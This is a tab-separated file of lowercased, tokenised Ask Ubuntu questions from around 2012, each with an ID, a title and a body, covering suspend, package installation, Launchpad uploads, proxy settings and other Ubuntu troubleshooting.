158532	xubuntu 12.04 restarts after suspend - only from my account	after installing a clean xubuntu 12.04 i noticed that when i suspend , the computer suspends and turns itself off ( you see the lights go off , and a click sound from the hd or fans ) , but then about 2 seconds later it turns itself back on again ... the odd thing is that : it does n't happen when booting from the livecd i created another user account . when i log onto this account i can suspend fine . the computer stays off until i press the on button when i remove my .config folder and it 's clean - i can also suspend without problem on my account so it seems that something in my user config is causing this , but i ca n't work out what it might be . i tried diffing the two .config folders , and also all processes running with one account compared to the other ( ps -ef |grep < username > ) , but could n't find anything obvious that might be causing this ... update : as requested , here 's the kern.log - with embeedded comments inside . it shows turning the computer on , logging in as the account that can suspend , suspending successfully , then turning off and on again , this time with my account , suspending ( but only for about 2 seconds and then the computer starts again ) and ~/.config contents + dmesg output
158533	how do i catch exception from sed when trying to read a non-existent file and write a handler for it ?	i am fetching specific value from a text file using sed into a variable . if the file does not exist , an error will be printed : sed : ca n't read filepath : no such file or directory how can i catch this error and display my own message and do my logic ? export result=`sed '' $ { file_path } | grep $ { var_name } | cut -d `` = '' -f2-`
158541	installing gcc from kubuntu dvd	i am having a hard time with a kubuntu 12.04 install that does not have an internet connection . in order to build the ethernet driver , i need gcc . i installed from the dvd , and i have gcc-4.7-base installed but that does not provide a gcc executable ? should i just make a symlink ? how should i install gcc otherwise ? thanks . edit : here are some attempts to install gcc . the cd-rom repo is enabled in /etc/apt/sources.list , and the full dvd is in the drive . shelly @ neptune : ~ $ sudo apt-get install gcc reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gcc-4.6 libc-dev-bin libc6-dev libgomp1 libquadmath0 linux-libc-dev manpages-dev suggested packages : gcc-multilib autoconf automake1.9 libtool flex bison gcc-doc gcc-4.6-multilib libmudflap0-4.6-dev gcc-4.6-doc gcc-4.6-locales libgcc1-dbg libgomp1-dbg libquadmath0-dbg libmudflap0-dbg binutils-gold glibc-doc the following new packages will be installed : gcc gcc-4.6 libc-dev-bin libc6-dev libgomp1 libquadmath0 linux-libc-dev manpages-dev 0 upgraded , 8 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/13.2 mb of archives . after this operation , 33.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libquadmath0 amd64 4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main gcc-4.6 amd64 4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main gcc amd64 4:4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libc-dev-bin amd64 2.15-0ubuntu10 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main linux-libc-dev amd64 3.2.0-23.36 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libc6-dev amd64 2.15-0ubuntu10 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main manpages-dev all 3.35-0.1ubuntu1 file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-4.6/libquadmath0_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-4.6/gcc-4.6_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-defaults/gcc_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/e/eglibc/libc-dev-bin_2.15-0ubuntu10_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/l/linux/linux-libc-dev_3.2.0-23.36_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/e/eglibc/libc6-dev_2.15-0ubuntu10_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/m/manpages/manpages-dev_3.35-0.1ubuntu1_all.deb file not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? shelly @ neptune : ~ $ shelly @ neptune : ~ $ shelly @ neptune : ~ $ sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : dpkg-dev fakeroot g++ g++-4.6 gcc gcc-4.6 libalgorithm-diff-perl libalgorithm-diff-xs-perl libalgorithm-merge-perl libc-dev-bin libc6-dev libdpkg-perl libgomp1 libquadmath0 libstdc++6-4.6-dev linux-libc-dev manpages-dev patch suggested packages : debian-keyring g++-multilib g++-4.6-multilib gcc-4.6-doc libstdc++6-4.6-dbg gcc-multilib autoconf automake1.9 libtool flex bison gcc-doc gcc-4.6-multilib libmudflap0-4.6-dev gcc-4.6-locales libgcc1-dbg libgomp1-dbg libquadmath0-dbg libmudflap0-dbg binutils-gold glibc-doc libstdc++6-4.6-doc diffutils-doc the following new packages will be installed : build-essential dpkg-dev fakeroot g++ g++-4.6 gcc gcc-4.6 libalgorithm-diff-perl libalgorithm-diff-xs-perl libalgorithm-merge-perl libc-dev-bin libc6-dev libdpkg-perl libgomp1 libquadmath0 libstdc++6-4.6-dev linux-libc-dev manpages-dev patch 0 upgraded , 19 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/22.8 mb of archives . after this operation , 62.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libquadmath0 amd64 4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libc-dev-bin amd64 2.15-0ubuntu10 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main linux-libc-dev amd64 3.2.0-23.36 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libc6-dev amd64 2.15-0ubuntu10 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main gcc-4.6 amd64 4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main gcc amd64 4:4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libstdc++6-4.6-dev amd64 4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main g++-4.6 amd64 4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main g++ amd64 4:4.6.3-1ubuntu5 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libdpkg-perl all 1.16.1.2ubuntu7 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main patch amd64 2.6.1-3 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main dpkg-dev all 1.16.1.2ubuntu7 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main build-essential amd64 11.5ubuntu2 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main fakeroot amd64 1.18.2-1 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libalgorithm-diff-perl all 1.19.02-2 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libalgorithm-diff-xs-perl amd64 0.04-2build2 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main libalgorithm-merge-perl all 0.08-2 file not found err cdrom : //kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) / precise/main manpages-dev all 3.35-0.1ubuntu1 file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-4.6/libquadmath0_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/e/eglibc/libc-dev-bin_2.15-0ubuntu10_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/l/linux/linux-libc-dev_3.2.0-23.36_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/e/eglibc/libc6-dev_2.15-0ubuntu10_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-4.6/gcc-4.6_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-defaults/gcc_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-4.6/libstdc++6-4.6-dev_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-4.6/g++-4.6_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/g/gcc-defaults/g++_4.6.3-1ubuntu5_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/d/dpkg/libdpkg-perl_1.16.1.2ubuntu7_all.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/p/patch/patch_2.6.1-3_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/d/dpkg/dpkg-dev_1.16.1.2ubuntu7_all.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/b/build-essential/build-essential_11.5ubuntu2_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/f/fakeroot/fakeroot_1.18.2-1_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/liba/libalgorithm-diff-perl/libalgorithm-diff-perl_1.19.02-2_all.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/liba/libalgorithm-diff-xs-perl/libalgorithm-diff-xs-perl_0.04-2build2_amd64.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/liba/libalgorithm-merge-perl/libalgorithm-merge-perl_0.08-2_all.deb file not found failed to fetch cdrom : [ kubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120423 ) ] /pool/main/m/manpages/manpages-dev_3.35-0.1ubuntu1_all.deb file not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? shelly @ neptune : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda5 15570572 2675916 12113448 19 % / udev 829680 4 829676 1 % /dev tmpfs 336752 816 335936 1 % /run none 5120 0 5120 0 % /run/lock none 841872 80 841792 1 % /run/shm /dev/sda6 454024280 6869848 424428648 2 % /home /dev/sr0 3401516 3401516 0 100 % /media/apt shelly @ neptune : ~ $ ls /media/ apt/ .directory .hidden shelly @ neptune : ~ $ ls /media/apt/ autorun.inf boot casper cdromupgrade dists doc efi install isolinux md5sum.txt pics pool preseed readme.diskdefines ubuntu wubi.exe
158543	problems uploading package to launchpad due to `` checksum mismatch '' error	i 'm having a lot of problems uploading my showdown project to a ppa . i 've setup correctly pgp keys and my public ssh key to launchpad . i 've packaged with debuild my c++ project , producing a source package lintian gave me only those two warnings that i think are ok for the showdown rules : w : massren source : native-package-with-dash-version w : massren source : binary-nmu-debian-revision-in-source 1.0-0extras12.04.1~ppa2 producing a binary package works to and the package installs without problem on my ubuntu 12.04 machine , i only have a few more lintian warnings about the fact i 'm installing in /opt/extras.ubuntu.com/ i 'm uploading with : dput ppa : gabrielegreco/massren massren_1.0-0extras12.04.1~ppa2_source.changes when i upload with dput i have no errors , signatures seems ok , and public key seems accepted to ( since the upload goes on without asking passwords ... ) : dput ppa : gabrielegreco/massren massren_1.0-0extras12.04.1~ppa2_source.changes checking signature on .changes gpg : signature made mon 02 jul 2012 10:00:38 am cest using rsa key id 49982576 gpg : good signature from `` gabriele greco `` good signature on /home/gabry/no-backup/massren_1.0-0extras12.04.1~ppa2_source.changes . checking signature on .dsc gpg : signature made mon 02 jul 2012 10:00:33 am cest using rsa key id 49982576 gpg : good signature from `` gabriele greco `` good signature on /home/gabry/no-backup/massren_1.0-0extras12.04.1~ppa2.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading massren_1.0-0extras12.04.1~ppa2.dsc : done . uploading massren_1.0-0extras12.04.1~ppa2.tar.gz : done . uploading massren_1.0-0extras12.04.1~ppa2_source.changes : done . successfully uploaded packages . at the moment i 'm not receiving responses from launchpad site , but the upload does not show in the ppa page . previous attempts gave me response e-mails with different kind of errors : file massren_1.0-0extras12.04.1~ppa1.tar.gz mentioned in the changes has a checksum mismatch . 1503fa155226cbc4aba2f8ba9aa11a75 ! = 294a5e0caf3fe95b0b007a10766e9672 file massren_1.0-0extras12.04.1~ppa1.tar.gz mentioned in the changes has a checksum mismatch . 1503fa155226cbc4aba2f8ba9aa11a75 ! = 294a5e0caf3fe95b0b007a10766e9672 or more cryptic : gpg verification of /srv/launchpad.net/ppa-queue/incoming/upload-ftp-20120629-163320-001135/~gabrielegreco/massren/ubuntu/massren_1.0-0extras12.04.1~ppa1.dsc failed : verification failed 3 times : [ `` ( 7 , 58 , u'no data ' ) '' , `` ( 7 , 58 , u'no data ' ) '' , `` ( 7 , 58 , u'no data ' ) '' ] further error processing not possible because of a critical previous error . any idea how can i solve this problem ? i 'm new to ubuntu packaging , so i may miss some step ... there is an alternative to dput ( aka manual upload ) ?
158544	will ubuntu server 12.04 run on a system with 8 physical cpus ?	is it possible to run ubuntu server 12.04 on a server with 8 individual physical processors . as my server has 8 individual physical processors and without them all being used , it is not as powerful as it can be . any ideas ?
158545	can i easily upgrade from debian squeeze to ubuntu 12.04 ?	is there an easy way to upgrade from debian squeeze to ubuntu 12.04 . the question is mainly targeted at a almost plain server installation of squeeze . i do not have physical access to the box , so a reinstall via cd rom /usb-stick is not an option for me .
158547	how do i change default program to open video files ( 12.04 ) ?	i would like to change the default program to open video files to vlc player . currently i have to right click on a file and choose 'open with ... ' option which is not the end of the world but very annoying ? is there a way to configure the default program to open video ( or any other file types for that matter ) ? ? ?
158549	apt-get works with -- force-yes but can not reproduce the issue on a fresh box	apt-get does not work the first time but works the second time . i installed ntp like : apt-get -q -y install ntp=1:4.2.6.p3+dfsg-1ubuntu3.1 it failed saying : warning : the following packages can not be authenticated ! libcap2 libopts25 ntp e : there are problems and -y was used without -- force-yes afterwards i ran : apt-key update and ran the same commad with -- force-yes : apt-get -q -y -- force-yes install ntp=1:4.2.6.p3+dfsg-1ubuntu3.1 thereafter running apt-get purge and reinstalling , ntp runs . apt-get purge libcap2 libopts25 ntp apt-get -q -y install ntp=1:4.2.6.p3+dfsg-1ubuntu3.1 also i created a fresh vm and could not reproduce the issue . on a fresh vm , the same apt-get command runs the first time , without -- force-yes . two questions , why does running apt-get work the second time and can not reproduce the error ? full errors and sequential steps at https : //gist.github.com/3017966 .
158550	ubuntu 12.04 faster boot , hibernate & other questions	i 've recently started exploring ubuntu ( my 1st distro ) . i fresh installed precise without a swap ( 4gb ram ) . the only issues are , slow boot ( regardless of the swap ) and instability after a few days of installation . the runtime performance is immaculate otherwise . even though not needed , i still set swappiness = 10 . i 've tried the quiet splash profile to grub ; already have preload installed . but it still is pretty slow . i am not too confident on recompiling the kernel yet . but you could please advice me on that too . i 've also added the following to fstab : # move /tmp to ram : tmpfs /tmp tmpfs defaults , noexec , nosuid 0 0 ( also if you could please tell me the exact implication/scope of this tweak on physical ram & the swap . ) but nothing has happened really . so what alternatives are there to make it boot faster ? also , right after fresh install , though no swap partition , the system still showed /dev/zram0 of arond 2gb which was never used ( probably because of the above fstab edit ) . finally , i experimented with hibernate a little , but many claim that it does n't work on 12.04 . ( not to mention , i made a swap file of 4gb for it ) . what i did was : sudo gedit /var/lib/polkit-1/localauthority/50-local.d/hibernate.pkla then i added the following lines , saved the file , and closed the text editor : [ re-enable hibernate ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes i also edited the upower policy for hibernate : gksudo gedit /usr/share/polkit-1/actions/org.freedesktop.upower.policy i added these lines : < allow_inactive > no < /allow_inactive > < allow_active > yes < /allow_active > but it did not work . so is there an alternate method perhaps that can make it work on 12.04 ?
158551	add console/text booting mode to grub menu	i want to have text booting mode option on grub menu screen . how do i create this menu entry ?
158555	how many maximum cpus does ubuntu support by default ?	i think this is kernel dependent and probably will change over time depending on the kernel a release uses , correct me if wrong i 'd like to know two things for all the currently supported ubuntu releases : how many maximum cpus can ubuntu handle ( by default ) at the same time with a standard desktop kernel ? is that count different from a server kernel and 32bit/64bit systems ? where can i find that information on my system ?
158556	messaging indicator does not obey applications-blacklist	since upgrading from 11.10 to 12.04 , the microblogging and instant messaging entries have reappeared in the messaging menu . i put symlinks in ~/.config/indicators/messages/applications-blacklist to deactivate empathy evolution gwibber.indicator ubuntuone-control-panel , but this does not seem to have any effect now . how can i remove these entries ? i would like to remove the status entries as well , and keep only thunderbird information .
158557	setting proxy from terminal	i have tried changing my proxy settings in a terminal as : export http_proxy=http : //10.1.3.1:8080 and export http_proxy=http : //10.1.3.1:8080 but when i try to install a new package or update apt-get , apt-get starts displaying messages from which it seems it is trying to connect to a previously set proxy : sudo apt-get update 0 % [ connecting to 10.1.2.2 ( 10.1.2.2 ) ] [ connecting to 10.1.2.2 ( 10.1.2.2 ) i have tried setting the proxy via bashrc file but that din work either . as far as i remember 10.1.2.2 was set using gnome gui but i do n't have access to the gui right now so i am trying to set it from terminal .
158558	quickly : how do i return entered data into parent window ?	at last i started a simple project ( you tube video downloader ) in quickly , but got stucked . i added youtube url entry dialog using quickly add dialog command and ; linked it to new button . how return url to the main window ? i do n't have any previous experiance with python my program now look like this
158572	what is the best way to restrict access to adult content ?	i bought my kids a pc and installed 12.04 ( unity ) on it . the bottom line is , i want my children to use the computer unsupervised while i have confidence they can not access anything inappropriate . what i have looked at : i was looking at scrubit a tool which allows me configure my wifi router to block content and this solution would also protect my other pc and mobile devices . this may be overkill as i just want the solution to work on one pc . i also did some google searches and came across the application called nanny ( it seems to look the part ) . my experience of oss is that the best solutions frequently never appear first on a google search list and in this case i need to trust the methods therefore my question is very specific . i want to leverage your knowledge and experience to understand what is the best way to restrict adult content on 12.04 lts as this is important to me . it maybe a combination of things so please do n't answer this question `` try this or that '' , then give me some ppa unless you can share your experience of how good it is and of course if there are any constraints .
158573	very slow reaction of application switching hotkeys with unity	since upgrading to 12.04 , i 've noticed that the shortcut keys for switching applications ( super+1 , super+2 ... ) are very difficult to use now . by that i mean that it does n't seem to register the keypresses simultaneously , and what ends up happening is that when i press super+1 , it will type a `` 1 '' into the current application and then open the unity launcher . i 'm quite certain that i 'm hitting them in the correct order , and i noticed this behaviour immediately upon upgrading and never before that on 11.10 .
158574	authentication problem at ubuntu 12.04	i get this error when i try to authenticate using gnome gui . i have no authentication problem when i use terminal . it is suggested here that i need to do sudo chown -r myusername : myusername /home/myusername however this leads to another error chown : can not access `/home/myusername/.gvfs ' : permission denied and this happens even if i run the above command as root . i read in launchpad that .gfvs is a fuse mount point so it can not be manipulated by root . however still have no clue how to fix this . appreciate your help .
158576	upload a folder ?	i see that i ca n't synch a folder outside my home folder , but can upload a file that is outside my home folder . can i upload a folder that is outside my home folder ? ( i ask because i have a dual-boot system , with a parition for each os and a third for my files , and it is these i want to synch ) cheers !
158577	how can i require users to also enter their usernames upon login ?	good day , does anyone know how to modify the login screen so that users are required to type their username along with their password ? i 'm running ubuntu 12.04 with all default settings
158578	is it possible to disable launcher grouping in unity ?	i am almost used to working with unity but the launcher grouping is really bugging me . i just want to be able to open a specific window with one click . currently all instances of an application are grouped under one icon . if that 's not possible in unity perhaps there is a dock bar alternative that offers the feature i require . sadly i have been unable to discover if awn , docky or any other dock bar offers this .
158581	is there an automated way to batch create a set of users ?	i 've looked into adduser and can see there are some modification flags that i can configure , but this still processes a single user at a time . is there a way to process a whole batch of users at one time ? i 'm thinking of reading in an csv with username and password . it looks like freebsd 's adduser had a hook for processing non-interactively .
158583	how can i fix the gtk hightlighted contex menues problems ?	here 's a screenshot of the trouble i 'm experiencing .
158584	share images using gwibbergtk	i am trying to implement social support into my app using gwibber . what i need to do is share opened images but it seems that there are no ways to do that using libgwibber only . so are there any workaround to implement this feature ? i 've tried to take a look in various api for web image hoster but all of them needs a registered user to upload files . maybe it can be done using ubuntu one / couchdb apis in python by publicating an hosted image and then getting the public link .
158588	why does n't 12.04 liveusb boot on an old dell inspiron 9300 ?	please excuse my poor english , i 'm italian . i 'm trying to use ubuntu desktop 12.04 lts on an old dell inspiron 9300 . i wanted to try the `` live '' version of ubuntu before installing it , just to read the content of my hard disk ( windows xp with personal data ) . i downloaded ubuntu iso . first i 've tried to burn it on a rewritable cd , but when i inserted it into my dell dvd drive , the computer could n't read it . so i thought of burning the ubuntu iso on a 2 gb usb flash drive . i 've used the process described here : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows that means that i used the `` universal usb installer '' program , and it `` burned '' the ubuntu iso on my pendrive . all the files have been correctly written on the pendrive . so , after changing the boot sequence on my dell pc ( i moved the usb device before hard disk ) , i started the pc with the pendrive inserted . an ubuntu start menu appeared . i tried two of the functions in the list : 1 ) run ubuntu from this usb 2 ) install ubuntu on a hard disk then , in both cases , this appears on the screen : loading /casper/vmlinuz ... ... loading /casper/initrd.lz ... ... ... ... .ready . but then , nothing . the cursors blinks and nothing happens . why ? thank you very much for your help ! : ) ps : a second question : when i will be able to use ubuntu , will i be able to see the windows xp and personal files on the my hard disk ? -- - edited message -- - ok , i did some test and here are some new info . first of all , i succeeded in starting up ubuntu using the cd , one time . the dvd drive is not working correctly since many months , but sometimes it works . actually i ca n't remember if the orange background appeared , but surely this was the last thing i read on the black screen : -- * starting configure network device security * starting configure network device * starting crash report submission daemon * stopping anac ( h ) ronistic cron * stopiing cpu interrupts balancing daeomn * starting configure network device security * starting configure network device * checking battery state ... * stopping system v runlevel compatibility stopping log initial device creation starting enable remaining boot-time encrypted block devices starting configure virtual network devices stopping configure virtual network devices starting configure network device security starting save udev log and update rules stopping save udev log and update rules * stopping enable remaining boot-time encrypted block devices then nothing . i ca n't start the installed windows xp so , and the laptop monitor is damaged ( i can see only two thirds of the screen ) . so the only info i gathered are these : pentium m 1.86 ghz 2 gb ram 60 gb hard disk nvidia geforce ( do n't know which one ) cd/dvd+/-rw drive now , i 'd like to talk about the same two experiments ( starting ubuntu via cd and via usb on my old dell laptop ) that i did some hours ago on a more recent notebook of mine , a toshiba a200 , with windows seven ultimate sp1 installed ( i now , it 's an `` old '' pc , but not as old as the dell inspiron , i think ) . here are the toshiba characteristics : intel core2 duo 1.83ghz 2 gb ram ati mobility radeon hd 2400 hitachi hard disk ( about 160 gb divided into two partitions : so and data ) tsstcorp cd/dvdw ts-l632d ata device i tried the ubuntu cd on this pc , and it works correctly . i tested the so without installing it , the orange background appeared , with menus , icons and windows , and i correctly read the files and folders in the two partitions of the hard disk . this demonstrates the the ubuntu cd is valid . the problem is that works on the toshiba but does n't work on the dell ( because , as i already said , the dvd drive often does n't read the disc , or , when the disc is read , the `` starting '' and `` stopping '' messages appears and finally everything stops . so i tried the usb drive on the toshiba , too . but i got the same results that i got when i used it on the dell . the screen displayed : -- loading /casper/vmlinuz ... ... loading /casper/initrd.lz ... ... ... ... .ready . so i deducted that my peak ii 2gb that i `` burned '' the ubuntu cd iso onto is not usable on my two pcs . my dell laptop is failing and i 'd just wanted to read the data on its hard drive ( formatted with ntfs ) , using a live os , the smallest possible one , and , knowing nothing of linux , i thought of ubuntu . but it did n't work . the windows xp installed on the dell does n't start because of hard disk errors , and anyway , i ca n't find my dell windows xp cd , so i ca n't try to repair it . what can i do ? thank you very much again ! ps : i have a `` limited '' internet connection ( 5gb of traffic each month for 20 euros ) so i would like not to use other money to download a different version of ubuntu or of linux , if possible . pps : the `` 1 ) run ubuntu from this usb 2 ) install ubuntu on a hard disk '' start menu that appears when i use my pendrive on both my laptops is not the one with the orange background and all the graphics . it 's the simple one , on black background , a big ubuntu logo and about 5 or 6 text rows to choose a startup function .
158596	no longer running a gnome-session ; how do i get the nice gtk theme back ?	i changed my desktop environment ( i forget exactly how ) to remove the gnome panels and instead i 'm using xmonad and xmobar and just terminal windows and so on . it seems i 'm no longer running in a gnome-session , however , and the gtk themes do n't load . if i run the gnome-settings-daemon it fixes this . what 's the best way to get the daemon to run on startup so i have the nice themes ?
158599	new files replaced with older one when synchronizing between windows and ubuntu	i am a programmer and i use ubuntu one to sync files between a windows 7 laptop and ubuntu 12 desktop . i keep the projects that i am working on always synced so that i can work both on my desktop and laptop as needed . but today i was horrified to see few of my files having old code . i had worked on ubuntu yesterday and today morning i switched on my laptop to let both sync . the older files in windows were written over my newer files in ubuntu and i had lost whole 1 day 's work ! there are two questions related to this problem here but they have not been answered . i have the latest version of ubuntu one in both my pcs . how can this be prevented from happening again ? is it something that i am doing ? but i have n't done anything other than installing u1 and keeping them updated ! if i do n't find and answer to this soon , i will have to let go of u1 which i do not want to do . any ideas anyone ? thank you ...
158601	gma500 screen resolution , 12.04 lts	i have dell mini 1010 with gma 500 chipset . i installed the ubuntu 12.04 and followed instructions for sorting out distorted display/blank screen . i am stuck with the 1024x576 screen display now . the supported resolution for notebook is apparently 1366x768 . i have tried modifing the grub_gfxpayload_linux and grub_gfxmode to 1366x768x32 ( as per wiki ) but it is not resolving the issue . can you please suggest any alternatives to fix this thing ? thanks
158604	how do i toggle an application 's menu ?	is it possible to toggle ( show/hide ) the appmenu ? i 've disabled the globalmenu , because i do n't like the behavior .
158617	why ca n't i get past choosing username and password when installing ubuntu ?	i have started installing ubuntu , and the screen has frozen at the point where i am asked to choose a username and password . i can not click continue . i can click back , but that 's it . i 'm trying to install ubuntu so i can use it as a fully-fledged os . this problem occurs while installing it from the live cd/dvd/usb , not while booting or testing ubuntu from the live media .
158618	how to install oracle xe from broken oracle repository ?	the [ identical ] instructions from these sites used to work : http : //www.oracle.com/technetwork/topics/linux/xe-on-kubuntu-087822.html http : //www.debianhelp.co.uk/oracle.htm http : //www.cyberciti.biz/faq/howto-install-linux-oracle-database-xe-server/ now they do n't because the apt-get update step hangs , as described here : why does apt-get keep waiting for headers on oracle repository ? what is an alternative way to download and install oracle xe ?
158626	installing mysql-server on 10.04lts gives `` 404 not found '' error	hi i am trying to install mysql on ubuntu 10.04lts ( lucid lynx ) and i am getting this error . is this a server side issue - is the server up ? i am running this from the command line on a remote server ... sudo apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libdbd-mysql-perl libdbi-perl libhtml-template-perl libmysqlclient16 libnet-daemon-perl libplrpc-perl mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server-5.1 mysql-server-core-5.1 psmisc suggested packages : dbishell libipc-sharedcache-perl tinyca mailx the following new packages will be installed : libdbd-mysql-perl libdbi-perl libhtml-template-perl libmysqlclient16 libnet-daemon-perl libplrpc-perl mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 psmisc 0 upgraded , 13 newly installed , 0 to remove and 85 not upgraded . need to get 23.2mb/24.3mb of archives . after this operation , 61.7mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ lucid-updates/main mysql-common 5.1.62-0ubuntu0.10.04.1 404 not found [ ip : 91.189.92.192 80 ] < more of the same error messages here > failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-common_5.1.62-0ubuntu0.10.04.1_all.deb 404 not found [ ip : 91.189.92.166 80 ] < more of the same error messages here > e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
158634	`` 'precise ' is no longer under development ''	today when trying to use some keyboard shortcuts to navigate ( mainly alt + tab , i 'm not really sure which combination ) i managed to crash compiz . then , in the middle of the crash report , apport shows me this : i really do n't know what to do ; ) i ca n't seem to reproduce the problem . what should i do to help fix this ?
